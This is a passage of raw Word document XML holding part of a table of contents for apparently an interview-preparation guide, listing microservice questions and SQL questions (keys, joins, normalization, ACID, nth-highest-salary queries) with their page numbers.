              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308171 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>929</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64E634A8" w14:textId="54DE112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7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are challenges in Microservice architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308172 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>931</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E7F0B3D" w14:textId="039DC02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7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are you handling load in your microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308173 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>933</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ADF06D1" w14:textId="3A90BF1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7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will you handle resilience and fault tolerance in microservice?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308174 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>935</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="791549E0" w14:textId="60A46B7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7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Can you explain Event driven microservice and how you have used it in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308175 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>936</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40C0214B" w14:textId="4F740CBE" w:rsidR="00012799" w:rsidRDefault="00012799">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308176" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308176 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>939</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25CA0B18" w14:textId="20670E2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7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Primary Key and Unique key?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308177 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>939</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5318712F" w14:textId="3C4AF33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7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different Keys in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308178 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>939</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BBAED44" w14:textId="1C433A6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7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ordered by and range in the database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308179 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>943</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D2D37B2" w14:textId="29C6026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8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SQL Query - Second Highest Salary of Employee from the Employee table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308180 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>944</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ABE9A61" w14:textId="08B5E61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8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SQL Query - print employee id, employee_name, depatment_name Employee - employee_id, employee_name, department_id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308181 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>944</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D3558AD" w14:textId="6D2822AB" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:szCs w:val="21"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196308182" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Department - department_id, department_name?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308182 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>944</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5297ABBB" w14:textId="63F1BCC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8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SQL Query - Find department name and number of employees in that department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308183 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>945</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA3F855" w14:textId="731D610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8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a collision in the oracle database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308184 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>945</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="707A8EB9" w14:textId="0036E8C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8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If you create multiple folders one inside another and store one file into the last folder then how can you implement using database tables in oracle? How many tables are required?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308185 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>945</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28C231BD" w14:textId="1CBD9FA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8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are DDL and DML commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308186 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>947</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CFAF41B" w14:textId="60ED3DF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8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SQL Query - To update data in the table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308187 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>948</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02737E7D" w14:textId="02D21A0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8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use of joins in the database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308188 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>948</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23C82A40" w14:textId="3954DAB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8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ACID properties in the database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308189 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>949</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51098C81" w14:textId="295D8B9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9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Normalization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308190 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>951</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="766004A1" w14:textId="6CCA0E0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9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Denormalization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308191 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>953</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C9E9789" w14:textId="6E3479A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9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use of join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308192 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>956</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B285722" w14:textId="14E3AC9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9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SQL Query - 7th highest salary of an employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308193 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>958</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65A3908F" w14:textId="7F3A6E3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9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Union in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308194 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>959</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EEDBCA7" w14:textId="2E47782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9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Can we perform union operations on one table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308195 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
